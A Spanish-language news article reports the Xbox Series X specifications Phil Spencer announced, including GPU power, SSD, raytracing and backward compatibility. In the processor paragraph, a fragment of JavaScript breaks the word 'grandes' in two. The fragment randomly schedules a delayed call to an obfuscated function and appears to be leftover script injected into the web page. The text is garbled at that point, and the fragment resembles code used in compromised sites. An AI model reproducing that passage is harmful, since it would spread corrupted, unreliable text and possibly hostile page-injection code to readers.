Microsoft revela especificaciones de la Xbox Series X

    Microsoft revela especificaciones de la Xbox Series X

    Phil Spencer, jefe de la división de videojuegos de la compañía, detalló lo nuevo de la consola Xbox Series X

    Autor: Jaime O. Pérez 25 febrero, 2020


    FOTO: Microsoft

     

    La nueva era en las consolas.

     

    Microsoft reveló las especificaciones oficiales que tendrá Xbox Series X, la cual está prevista para llegar en diciembre.

     

    En una publicación de Phil Spencer, jefe de la división de videojuegos de la compañía, ha detallado todo lo nuevo que trae esta consola.

     

    Ahora tendrá 12 teraflops (una medida de billones de operaciones de señalización flotante por segundo), de potencia de GPU, retrocompatibilidad con versiones anteriores de juegos originales de XBOX, disco duro SSD, reanudación rápida para múltiples juegos.

     

     

    Procesador nueva generación

     

    Tendrá cuatro veces el poder de procesador del Xbox One y ofrece 12 teraflops de GPU, el doble de una Xbox One X. Todo para tener mundos más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes y una experiencia durante el juego como ninguna consola. La tarjeta gráfica está basada en una arquitectura RDNA 2 y el procesador Ryzen con arquietectura Zen 2.

     

    Más realistas

     

    Se confirma que la Xbox Series X tendrá Raytracing, algo que según Phil Spencer ofrece «más entornos realistas y dinámicos por primera vez en una consola, lo que significa iluminación más realista, reflejos más precisos y todo en tiempo real».

     

     

    Uno de los compromiso de Microsoft es que todos los juegos de Xbox One, los retrocompatibles de 360 y de la Xbox original se vean y se jueguen mejor que nunca.

     

    Te puede interesar: Alienware y su nuevo concepto de juegos portátil

     

     

    Temas relacionados con esta nota: , , ,

Phil Spencer, jefe de la división de videojuegos de la compañía, detalló lo nuevo de la consola Xbox Series X